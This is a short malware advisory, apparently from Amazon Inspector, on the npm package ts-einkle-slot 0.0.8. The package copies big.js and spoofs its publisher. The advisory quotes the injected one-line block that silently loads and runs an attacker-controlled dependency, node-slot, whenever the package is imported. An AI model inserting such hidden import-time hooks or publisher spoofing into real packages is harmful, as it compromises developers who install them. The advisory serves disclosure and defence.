ts-einkle-slot @0.0.8

Summary

Package is published as ts-einkle-slot but its tarball contents (source, README, LICENCE, package.json author/repository/description) are copied verbatim from Michael Mclaughlin's legitimate big.js package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints ( big.js and big.mjs , referenced from main / module / exports ) contain an injected top-level block: try { const doc = require('node-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {} . This causes the transitive dependency node-slot (pulled in via the declared ts-einkle dependency) to be loaded and its from_str() invoked the moment any consumer require s or import s this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated node-slot runtime module on import. Installer harm is delivered by the attacker-controlled transitive node-slot , which is pulled into the install tree solely by virtue of installing this package.

Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)